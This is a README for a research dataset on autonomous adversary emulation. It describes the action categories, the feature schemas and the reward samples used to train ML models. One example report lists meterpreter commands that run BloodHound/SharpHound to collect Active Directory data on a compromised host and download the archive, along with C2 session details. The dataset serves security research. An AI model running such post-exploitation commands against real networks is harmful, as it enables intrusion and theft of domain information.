The dataset within this repository is released in order to facilitate research regarding autonomous adversary emulation. The dataset was gathered by running Lore scenarios against a emulated IT-environment. For full description, please see paper X. For seven action categories a number of (feature, reward) samples are recorded. The task is to predict the reward.
For any questions about the dataset, please contact blinded-author
.
We use the following ActionCategory and better explained name in the paper:
ActionCategory | Paper name |
---|---|
CredentialHarvesting | Shellcode to extract credentials |
General | General |
MetasploitLocalExploit | Local exploits |
MetasploitPost | Miscellaneous shellcode |
MetasploitServerExploit | Server exploits |
MetasploitStandardAuxiliary | Auxiliary |
NetworkScanning | Network scanning |
OnlinePasswordGuessing | Online password guessing |
PasswordCracking | Password cracking |
.
├── evaluation
│ ├── crate_envs - description of the environment used
│ ├── lore_reports - description of carried out actions for the scenarios
│ └── lore_scenarios - description of config files for the scenarios
└── training
├── crate_envs - description of the environment used
├── lore_reports - description of carried out actions for the scenarios
├── lore_scenarios - description of config files for the scenarios
└── ml_training_samples
├── MetasploitPost - action category
│ ├── feature_schema.json - feature space description
│ └── dataset_compressed_for_ml.json - (features, reward) samples
├── NetworkScanning
├── feature_schema.json
└── dataset_compressed_for_ml.json
The directory training
include the samples that can be used for training ML models. The directory evaluation
include data about the tests used to provide a secondary evaluation of the trained models on a different IT environment and using a different Lore scenario configuration.
For each type of action category, there is an associated feature-space meaning that we essentially require different models for the different categories.
The description of the feature-space is found in the feature_schema.json
.
A excerpt is explained below. The structure of the dataset_compressed_for_ml.json
is also explained below.
feature_schema.json
A subset of the feature groups and features in the feature groups for the Network Scanning category is found below. There are integers (either categorical or regular), floats, booleans and arrays.
{
"properties": {
"ConcernedAbstractAction": { <---- feature group
"type": "object",
"properties": {
"concerned_abstract_action": { <--- feature in feature group
"type": "integer", <---- feature type
"description": "One hot encoding (index) of the chosen action uid.", <--- signifies categorical value
"minimum": 0, <--- bounds for the values
"maximum": 5533
}
}
},
"PreviousActionAttempts": {
"type": "object",
"properties": {
"action_type_previous_tests_count": {
"type": "integer",
"description": "The number of times the action type has been used during the scenario session." <--- i.e. not categorical
},
"action_type_percent_successful": {
"type": "float",
"description": "The percentage of attempts that the action type has been successful during the scenario session.",
"minimum": 0,
"maximum": 1
},
},
"ActionBuilderDependencies": {
"type": "object",
"description": "Action builder dependencies.",
"properties": {
"action_builder_dependency_0": {
"type": "array", <--- signifies multiple values for this feature
"items": {
"type": "float"
},
"minItems": 20, <--- length of array, currently minItems=maxItems for all arrays
"maxItems": 20
},
}
},
"OverallTypeOfOperatingSystem": {
"type": "object",
"properties": {
"os_type": { <--- another example of categorical feature
"type": "integer",
"description": "One hot encoding index of overall kind of operating system.",
"minimum": 0,
"maximum": 3
}
}
},
"AttackerAndVictimOnTheSameSubnet": {
"type": "object",
"properties": {
"attacker_and_victim_on_the_same_subnet": {
"type": "boolean", <--- can also be simple boolean
"description": "If the attacker has access to resources on the same LAN as the victim, and thus can send traffic to it without worrying as much about firewall/nids rulesets etc."
}
}
}
}
}
dataset_compressed_for_ml.json
Each dataset_compressed_for_ml.json
has the same structure.
A results
key with a list of rewards and a feature
key with the features.
The features dict has the same structure as the feature_schema.json
with the features as a list of values.
The n:th feature of each list correspond to the n:th reward.
{
"results": [ float, float, float, float, ... ],
"features": {
"ConcernedAbstractAction": { <---- feature group
"concerned_abstract_action": [0, 0, 4300, 0, ...],
},
"PreviousActionAttempts": {
"action_type_previous_tests_count": [1, 0, 0, 100, ...],
"action_type_percent_successful": [0.0, 0.2, 0.0, 0.1, ...],
},
"ActionBuilderDependencies": {
# list of lists of length 20 (as described by feature schema)
"action_builder_dependency_0": [[0, 0, ...], [0, 0, ...]],
},
"OverallTypeOfOperatingSystem": {
"os_type": [0, 0, 3, 1, ...],
},
"AttackerAndVictimOnTheSameSubnet": {
"attacker_and_victim_on_the_same_subnet": [0, 1, 0, 1, ...],
}
}
}
lore_reports
The .json files in the lore_reports
directories include summary reports by Lore for the carried out actions during each executed scenario. Each report describe summary information about an executed action. Two example reports are given below.
{
"action_category": "Metasploit",
"action_description": "Determine what local users exist via the SAM RPC service",
"action_info": {
"attacker": "134.23.2.150:",
"target": "134.23.4.44:"
},
"action_outcome": "SUCCESSFUL",
"action_uid": "auxiliary/scanner/smb/smb_enumusers",
"c2_info": null,
"mitre_att&ck": {
"tactics": [
"TA0007"
],
"techniques": [
"T1087"
]
},
"time_end": "2024-06-05 04:23:36",
"time_start": "2024-06-05 04:23:32"
},
{
"action_category": "Metasploit.Shellcode",
"action_description": "Runs BloodHound on a compromised machine as a powershell script (SharpHound.ps1) through a meterpreter session. A session can be matched either by the info-field, address-field, exploit field or session key.",
"action_info": {
"commands": [
"mkdir c:\\\\temp\\\\",
"load powershell",
"powershell_import /mnt/sved/tools/SharpHound.ps1",
"powershell_execute 'Invoke-BloodHound -CollectionMethod All -JSONFolder c:\\\\temp\\\\ -ZipFileName bh_404372.zip'",
"download c:\\\\temp\\\\bh_404372.zip /mnt/sved/lore/scenarios/Tyrdemo_insider_ANN_1_session_4/reports/bh_404372.zip"
],
"target": "hq01.office.tyrdemo.se"
},
"action_outcome": "SUCCESSFUL",
"action_uid": "BloodHound",
"c2_info": {
"active_since": "2024-06-05 04:03:49",
"established_via": "exploit/multi/handler",
"shell_type": "meterpreter",
"shell_user": "system",
"tunnel_in": "134.23.2.150:8081",
"tunnel_out": "134.23.3.11:50235"
},
"mitre_att&ck": {
"tactics": [
"TA0007"
],
"techniques": [
"T1087.001",
"T1087.002",
"T1069.002",
"T1615",
"T1018",
"T1201"
]
},
"time_end": "2024-06-05 04:05:54",
"time_start": "2024-06-05 04:05:04"
}
The reports in the evaluation
directory are complete, i.e., they include information regarding all carried out Lore scenarios. The reports in the training
folder are a subset of the 923 executed Lore scenarios during training.
crate_envs
The crate_envs
directories include descriptive information regarding the IT environments used for the scenarios.
lore_scenarios
The lore_scenarios
directories include the Lore configuration files used for the scenarios.